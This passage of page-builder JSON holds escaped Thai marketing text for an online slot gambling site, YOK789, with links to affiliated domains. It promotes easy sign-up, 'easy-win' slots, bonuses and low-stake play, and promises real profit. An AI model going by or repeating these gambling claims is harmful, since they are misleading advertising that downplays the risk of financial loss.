\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><h3><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/h3><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 